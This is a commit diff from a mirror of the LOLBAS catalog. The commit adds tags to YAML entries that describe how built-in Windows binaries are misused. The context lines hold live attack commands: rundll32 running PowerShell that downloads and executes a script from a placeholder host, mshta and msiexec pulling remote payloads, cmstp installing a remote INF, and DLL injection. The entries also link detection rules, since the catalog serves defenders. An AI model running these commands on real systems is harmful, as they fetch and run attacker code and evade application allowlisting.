mirror/ LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-05-04 06:36:21 +02:00
Code Issues

Adding tags (closes #9, #318) (#362) 

* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze 2024-04-03 16:53:36 +01:00 committed by GitHub
parent a945bac6be
commit ebbf08ec4d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
65 changed files with 229 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.github/workflows/gh-pages.yml vendored
View File

@ -20,6 +20,7 @@ jobs:
mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts
rm -r yml/HonorableMentions
- name: Deploy to LOLBAS-Project.github.io repo
uses: peaceiris/actions-gh-pages@v3

8
YML-Schema.yml
View File

@ -57,6 +57,14 @@ mapping:
"OperatingSystem":
type: str
required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path":
type: seq
required: true

2
YML-Template.yml
View File

@ -13,6 +13,8 @@ Commands:
Privileges: Required privs
MitreID: T1055
OperatingSystem: Windows 10 1803, Windows 10 1703
Tags:
- Key1: Value1 # Optional field for one or more tags
- Command: The second command
Description: Description of the second command
Usecase: A description of the usecase

4
yml/OSBinaries/AppInstaller.yml
View File

@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Detection:

4
yml/OSBinaries/Certoc.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.
@ -21,8 +23,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
- IOC: Process creation with given parameter

4
yml/OSBinaries/Cmstp.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe

4
yml/OSBinaries/ConfigSecurityPolicy.yml
View File

@ -12,12 +12,14 @@ Commands:
MitreID: T1567
OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

4
yml/OSBinaries/Control.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml

4
yml/OSBinaries/Cscript.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

4
yml/OSBinaries/Diantz.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
Full_Path:
- Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe

4
yml/OSBinaries/Dnscmd.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: DNS admin
MitreID: T1543.003
OperatingSystem: Windows server
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path

4
yml/OSBinaries/Eventvwr.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe

2
yml/OSBinaries/Expand.yml
View File

@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml

4
yml/OSBinaries/Extexport.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path

4
yml/OSBinaries/Extrac32.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav

4
yml/OSBinaries/IMEWDBLD.yml
View File

@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection:

10
yml/OSBinaries/Installutil.yml
View File

@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
@ -18,13 +21,18 @@ Commands:
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe

4
yml/OSBinaries/Jsc.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

8
yml/OSBinaries/Makecab.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
@ -25,11 +29,11 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path:
- Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml

6
yml/OSBinaries/Mavinject.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
@ -18,11 +20,11 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation

4
yml/OSBinaries/Msbuild.yml
View File

@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
@ -32,6 +34,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections

6
yml/OSBinaries/Msdt.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting
@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe

8
yml/OSBinaries/Mshta.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
@ -32,13 +34,17 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: WSH
- Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe

6
yml/OSBinaries/Msiexec.yml
View File

@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
@ -32,6 +34,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
@ -42,8 +46,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml

4
yml/OSBinaries/Netsh.yml
View File

@ -11,11 +11,11 @@ Commands:
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml

4
yml/OSBinaries/Odbcconf.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
@ -20,6 +22,8 @@ Commands:
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures

2
yml/OSBinaries/OfflineScannerShell.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:

4
yml/OSBinaries/Pcalua.yml
View File

@ -18,6 +18,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
@ -27,8 +29,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
Resources:

4
yml/OSBinaries/Presentationhost.yml
View File

@ -12,12 +12,14 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe

4
yml/OSBinaries/PrintBrm.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:

4
yml/OSBinaries/Rasautou.yml
View File

@ -11,10 +11,10 @@ Commands:
Privileges: User, Administrator in Windows 8
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\rasautou.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
- IOC: rasautou.exe command line containing -d and -p

8
yml/OSBinaries/Regasm.yml
View File

@ -11,6 +11,9 @@ Commands:
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
@ -18,13 +21,14 @@ Commands:
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

2
yml/OSBinaries/Register-cimprovider.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe

8
yml/OSBinaries/Regsvcs.yml
View File

@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
@ -18,11 +21,12 @@ Commands:
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

12
yml/OSBinaries/Rundll32.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
@ -53,18 +57,20 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
